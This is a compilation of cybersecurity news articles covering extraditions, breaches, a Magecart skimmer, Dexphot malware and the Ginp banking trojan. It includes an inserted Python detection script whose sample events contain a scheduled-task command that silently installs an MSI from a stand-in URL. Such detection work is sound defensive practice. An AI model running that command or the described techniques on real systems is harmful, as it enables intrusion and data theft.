Alleged Member of ‘Dark Overlord’ Hacker Group Extradited From UK to US

A UK national suspected of being a member of the notorious hacker group called The Dark Overlord has been extradited to the United States, the U.S. Department of Justice announced on Wednesday.

Nathan Wyatt, 39, has been charged by U.S. authorities on six counts of aggravated identity theft, threatening to damage a protected computer, and conspiracy.

The Dark Overlord hacked into the systems of many companies in the United Kingdom and the United States. The cybercriminals stole information from the targeted organizations and used that information to convince them to pay a ransom.

According to the indictment made public by the Justice Department, Wyatt used phone and email accounts to send threatening messages to The Dark Overlord victims in an effort to get them to pay up.

Victims included companies in the film, healthcare, finance, legal and various other industries. U.S. prosecutors have focused on the attacks targeting one accounting and four healthcare companies.

The indictment references Wyatt’s alleged activities from February 2016 until June 2017. Wyatt has been in jail in the United Kingdom since 2017 after pleading guilty to separate charges related to blackmail, possession of a fake passport, and using stolen payment card data.

“Today’s extradition shows that the hackers hiding behind The Dark Overlord moniker will be held accountable for their alleged extortion of American companies,” said Brian A. Benczkowski, assistant attorney general for the Criminal Division of the Department of Justice. “We are thankful for the close cooperation of our partners in the United Kingdom in ensuring that the defendant will face justice in U.S. court.”

In May 2018, police in Serbia claimed to have arrested another alleged member of The Dark Overlord, but Motherboard reported at the time that the group had continued to operate.

Related: First Cypriot to Be Extradited to US, on Hacking Charges

Related: Nigerian Extradited to U.S. Over Role in Major Cybercrime Scheme

Related: Russian Accused of $20M Credit Card Fraud Extradited to US

Related: Lithuanian Extradited to U.S. Over Hacking, Fraud Charges

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Bill to Protect U.S. Energy Grid From Cyberattacks Passes With NDAA

Legislation that aims to protect the U.S. energy grid from cyberattacks passed the House this week after being added to the 2020 National Defense Authorization Act (NDAA).

The 2020 NDAA passed the House by a vote of 377 to 48 and President Donald Trump is expected to sign it soon.

The annual military bill includes the Securing Energy Infrastructure Act, which establishes a two-year pilot program within Energy Department national laboratories with the goal of identifying vulnerabilities and isolating critical grid systems.

The Securing Energy Infrastructure Act was introduced by Sen. Angus King and Sen. Jim Risch, and a companion bill has been introduced in the House of Representatives by Rep. Dutch Ruppersberger and Rep. John Carter.

The bill proposes solutions such as the use of analog backup systems, which could prevent cyberattacks from causing too much damage.

“This approach seeks to thwart even the most sophisticated cyber-adversaries who, if they are intent on accessing the grid, would have to actually physically touch the equipment, thereby making cyber-attacks much more difficult,” according to a press release from Sen. Angus’ office.

The bill also requires the creation of a working group that would analyze the solutions proposed by national laboratories and develop a national strategy for protecting the energy grid.

“The energy grid powers our financial transactions, communications networks, healthcare services and most of our daily life, so if this critical infrastructure is compromised by a hacker, these building blocks of American life are at risk,” said Senator King. “Protecting our energy grid is commonsense, bipartisan, and vital to national security, and I’m happy this year’s NDAA will enshrine this needed provision into law.”

The cyber and physical security of North America’s energy grid was tested recently as part of a major exercise called GridEx V. More than 6,500 participants representing more than 425 government and energy sector organizations in the United States, Canada and Mexico took part in the two-day exercise.

Earlier this year, a power utility in the U.S. reported interruptions to electrical system operations as a result of a denial-of-service (DoS) attack that involved the exploitation of a known vulnerability in Cisco firewalls.

Related: House Passes Bill to Enhance Industrial Cybersecurity

Related: U.S. Energy Firm Fined $2.7 Million Over Data Security Incident

Related: U.S. to Help Secure Baltic Energy Grid Against Cyber Attacks

Hackers Accessed Information of T-Mobile Prepaid Customers

T-Mobile informed some prepaid customers this week that their personal information may have been compromised as a result of a hacker attack.

The company said it recently noticed unauthorized access to some prepaid wireless accounts. These accounts can store names, billing addresses, phone numbers, account numbers, and details about the customer’s mobile plans and features (e.g. whether they use an international calling feature).

This last piece of information represents customer proprietary network information (CPNI) under rules of the U.S. Federal Communications Commission (FCC), which is why the company is required to notify impacted individuals. The telecoms firm has also informed authorities of the incident.

T-Mobile says the incident did not involve any financial information (such as payment card data), social security numbers, or passwords.

Impacted customers have been notified via SMS and they have been urged to confirm or update their PIN on their T-Mobile account for extra protection.

No details have been disclosed about the attack itself and it’s unclear how many customers have been impacted. However, given that T-Mobile has millions of prepaid customers, even a small percentage could mean a significant number of victims.

The disclosure of this incident comes roughly one year after T-Mobile admitted that it had suffered a data breach impacting over 2 million customers. That attack also resulted in personal information getting accessed by hackers.

Related: Swisscom Breach Hits 800,000 Customers

Related: Industry Reactions to Nation-State Hacking of Global Telcos

Related: Bell Canada Hit by Data Breach

Website of Gunmaker Smith & Wesson Hacked in Magecart Attack

The website of American gunmaker Smith & Wesson was hacked late last month and the hackers planted malicious code designed to steal customers’ payment card information.

According to Willem de Groot of Netherlands-based ecommerce fraud protection company Sanguine Security, the attackers planted a payment skimmer on the Smith & Wesson online store on November 27.

The expert has pointed out that the Smith & Wesson store loads malicious code from a domain set up by the attackers. The skimmer captures personal and financial information entered by users on the checkout page and sends it to the cybercrooks.

The attack appears to be the work of one of the several threat groups specializing in Magecart attacks, which involve planting credit card skimmers either directly on the targeted online stores or through companies providing services to online shops.

De Groot says the skimming code and infrastructure used in the Smith & Wesson attack is identical to one spotted in a campaign impersonating Sanguine Security. In that operation, Magecart hackers registered fake Sanguine Security domains under De Groot’s name, and they used those domains to “funnel stolen payments.”

Magento contributor Daniel Ruf suggested that the attackers exploited a known vulnerability in the Magento ecommerce platform to hack the Smith & Wesson website. SecurityWeek can confirm that the Smith & Wesson online store appears to run on Magento.

Magento issued a warning recently, urging customers to install patches for a remote code execution vulnerability that can be exploited by unauthenticated hackers to deliver malware.

SecurityWeek has reached out to Smith & Wesson for comment and will update this article if the company responds. The malicious code is still present on the organization’s website at the time of writing.

Smith & Wesson website hacked

The official website of Macy’s was also compromised recently as a result of a Magecart attack and the company’s stock dropped 10 percent after news of the data breach broke.

Related: Magecart Attack on eCommerce Platform Hits Thousands of Online Shops

Related: Magecart Hackers Target Mobile Users of Hotel Websites

Related: Magecart Group Tied to Cobalt Hackers

Dexphot Malware Uses Randomization, Encryption, and Polymorphism to Evade Detection

Malware that Microsoft has been tracking for over a year has been leveraging numerous techniques for evasion, including random file names, fileless installation, and polymorphism.

Microsoft, which calls the malware Dexphot, noticed that it attempted to deploy files that changed two or three times per hour. Targeting thousands of devices, the polymorphic malware was running code directly in memory and hijacking legitimate system processes to evade detection.

Large-scale at first, the campaign dropped in intensity over time, and only a few machines still encounter Dexphot-related malicious behavior.

Dexphot’s infection process starts with the writing of five files to disk: an installer with two URLs, an MSI file, a password-protected ZIP archive, a loader DLL extracted from the archive, and an encrypted data file containing three additional executables.

The malware abuses numerous legitimate system processes during execution, such as msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe, and powershell.exe in early stages, and svchost.exe, tracert.exe, and setup.exe in later stages.

The Dexphot installer is dropped and executed by SoftwareBundler:Win32/ICLoader and its variants. The installer then leverages two URLs to fetch malicious payloads (the same URLs are later used for persistence, updates, and re-infection).

An MSI package is downloaded from one URL and msiexec.exe is used for a silent install. A batch script in Dexphot’s package is executed first, when the installation process starts, to check for antivirus products.

The malware checks for the presence of antivirus products from Avast and AVG, as well as for Windows Defender Antivirus, and the infection is halted if such an application is found.

Otherwise, the password-protected ZIP archive is decompressed to extract the loader DLL, an encrypted data file and an unrelated DLL.

Next, process hollowing is used: the loader DLL targets two legitimate system processes and spawns them in suspended state, then replaces their contents with two malicious executables, after which it releases them from suspension.

The setup.exe process is then targeted and its contents replaced with a third executable, a cryptocurrency miner.

The first two executables represent monitoring services for Dexphot’s components, ensuring persistence. Each checks the status of all three malicious processes and, if any is terminated, begins re-infection. The monitoring services also check for cmd.exe processes and terminate them immediately.

The malware also creates scheduled tasks, as a persistence fail-safe. These tasks run malicious code using msiexec.exe as a proxy and also allow Dexphot to update components.

Multiple levels of polymorphism are used, with each MSI package being unique due to the included files: a clean version of unzip.exe, a password-protected ZIP file, and a batch script. The script is not always present, and the names of the other files and the password for the ZIP file change for each package.

The content of the loader DLL also differs from one package to another, as does the encrypted data in the ZIP file.

The domains used in the attacks follow a similar pattern, with the file name for the payload randomly created. Many of the domains were used for a long time, but the MSI packages were frequently changed or updated. Overall, Microsoft identified around 200 unique Dexphot domains.
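The process chain described above (silent msiexec.exe install from a downloaded package, script tooling spawned by msiexec.exe, scheduled tasks proxied through msiexec.exe, and hollowed svchost.exe/tracert.exe/setup.exe launched by the rundll32.exe-hosted loader) lends itself to simple parent/child telemetry rules. The following is an added example, not Microsoft's or SecurityWeek's code; the sample events are constructed in a Sysmon-like shape and the rule thresholds are assumptions drawn from the article's description, not observed Dexphot indicators.

```python
"""Heuristic detection of the Dexphot-style process chain over process-creation telemetry."""
import re

# Constructed sample telemetry: (parent image, image, command line). Not real Dexphot data.
EVENTS = [
    ("explorer.exe", "installer.exe", "installer.exe"),
    ("installer.exe", "msiexec.exe", "msiexec.exe /i C:\\Users\\u\\AppData\\Local\\Temp\\a1b2.msi /q"),
    ("msiexec.exe", "cmd.exe", "cmd.exe /c check.bat"),
    ("msiexec.exe", "unzip.exe", "unzip.exe -P x9 pkg.zip"),
    ("msiexec.exe", "rundll32.exe", "rundll32.exe ldr.dll,Run"),
    ("msiexec.exe", "schtasks.exe",
     "schtasks.exe /create /tn Upd /tr \"msiexec.exe /i http://example.invalid/p.msi /q\" /sc minute"),
    ("rundll32.exe", "svchost.exe", "svchost.exe"),
    ("rundll32.exe", "tracert.exe", "tracert.exe"),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),   # benign: normal svchost parent
    ("explorer.exe", "msiexec.exe", "msiexec.exe /i setup.msi"),  # benign: interactive install
]

# Tooling the article says the package's batch script drives during the MSI install.
MSI_CHILDREN = {"cmd.exe", "unzip.exe", "rundll32.exe", "schtasks.exe", "powershell.exe"}
# Processes the article says are hollowed; the loader DLL runs inside rundll32.exe (assumption).
HOLLOW_TARGETS = {"svchost.exe", "tracert.exe", "setup.exe"}
SILENT = re.compile(r"(^|\s)/q(n|b|uiet)?(\s|$)", re.I)


def classify(parent, image, cmdline):
    """Return the rule names one event matches; an empty list means no finding."""
    hits = []
    p, i, c = parent.lower(), image.lower(), cmdline.lower()
    # Silent MSI install whose package sits in a temp directory or comes from a URL.
    if i == "msiexec.exe" and SILENT.search(cmdline) and ("\\temp\\" in c or "://" in c):
        hits.append("silent_msi_from_temp_or_url")
    # msiexec.exe should not normally spawn shells, unzip tools, rundll32 or schtasks.
    if p == "msiexec.exe" and i in MSI_CHILDREN:
        hits.append("msiexec_spawns_script_tooling")
    # Persistence fail-safe: a scheduled task whose action is msiexec.exe.
    if i == "schtasks.exe" and "/create" in c and "msiexec" in c:
        hits.append("scheduled_task_proxied_by_msiexec")
    # svchost.exe normally descends from services.exe; rundll32.exe as parent is anomalous.
    if i in HOLLOW_TARGETS and p == "rundll32.exe":
        hits.append("hollow_target_spawned_by_rundll32")
    return hits


def scan(events):
    """Return (index, image, hits) for every event that triggers at least one rule."""
    findings = []
    for idx, (parent, image, cmdline) in enumerate(events):
        hits = classify(parent, image, cmdline)
        if hits:
            findings.append((idx, image, hits))
    return findings


if __name__ == "__main__":
    for idx, image, hits in scan(EVENTS):
        print(f"event {idx}: {image} -> {', '.join(hits)}")
```

Individually each rule is noisy on an estate with legitimate packaging tooling; the value is in several of them firing on one host within a short window, which is how the chain above would present.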

“Dexphot is not the type of attack that generates mainstream media attention; it’s one of the countless malware campaigns that are active at any given time. […] Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats, intent on evading protections and motivated to fly under the radar for the prospect of profit,” Microsoft concludes.

Related: ‘Cloud Atlas’ Cyberspies Use Polymorphic Malware in Government Attacks

Related: Dridex Employs Polymorphism in Recent Campaign

Ionut Arghire is an international correspondent for SecurityWeek.

New ‘Ginp’ Android Trojan Targets Credentials, Payment Card Data

A recently discovered Android banking Trojan that features a narrow target list and two-step overlays is capable of stealing both login credentials and credit card data, ThreatFabric reports.

Dubbed Ginp and identified in October, the malware has been around since June and has seen five major updates since, with the latest bringing pieces of code copied from the Anubis banking Trojan.

Initially, Ginp was masquerading as a “Google Play Verificator” app and was focused on stealing the victim’s SMS messages. In August, it was updated with banking-specific features and started posing as fake “Adobe Flash Player” apps.

By abusing the Accessibility Service, the malware could perform overlay attacks and set itself as the default SMS app. Its generic credit card grabber targeted programs such as Google Play, Facebook, WhatsApp, Chrome, Skype, Instagram and Twitter. A third version added payload obfuscation and Snapchat and Viber to the target list.

The next version introduced code taken from Anubis — the malware’s source code was leaked earlier this year — and switched to a new overlay target list, focused on banks. It now targets 24 apps belonging to seven different Spanish banks: CaixaBank, Bankinter, Bankia, BBVA, EVO Banco, Kutxabank and Santander.

Detected this month, the most recent version of the malware brings only small modifications, including a new endpoint apparently related to downloading a module, likely with new features or configurations.

Once executed on the victim device, the malware removes its icon from the app drawer, then asks for the Accessibility Service privilege. As soon as it receives these privileges, the malware grants itself additional permissions to be able to send messages and make calls.

Based on received commands, Ginp can send or harvest SMS messages, update the command and control (C&C) URL, update the target list, request admin privileges, set itself as the default SMS app, prevent the user from disabling Accessibility Services, enable overlay attacks, get installed apps or contacts, enable call forwarding, and hide itself and prevent removal, among others.

In addition to requesting the victim’s login credentials, the malware’s overlays demand credit card details, claiming they are necessary to validate the user’s identity. Once this second step has been completed, the successfully targeted application will be ignored in future attacks.

Simple but effective, Ginp is expected to evolve, likely adding some more capabilities taken from Anubis. Within 5 months, its authors have proven they can build a Trojan from scratch and pack it with powerful capabilities.

“Ginp’s unusual target selection is not just about its focus on Spanish banks but also the wide selection of targeted apps per bank. The fact that the overlay screens are almost identical to the legitimate banking apps suggests that the actors might be very familiar with the Spanish banking applications and might even be accustomed to the language,” ThreatFabric points out.

Given that the path used in the inject requests contains the country code of the targeted institution, ThreatFabric believes that the malware author is already planning an expansion to additional countries or regions.

Related: Researchers Find 17,490 Anubis Android Malware Samples

Related: New Strain of Android Malware Found on Third-Party App Store
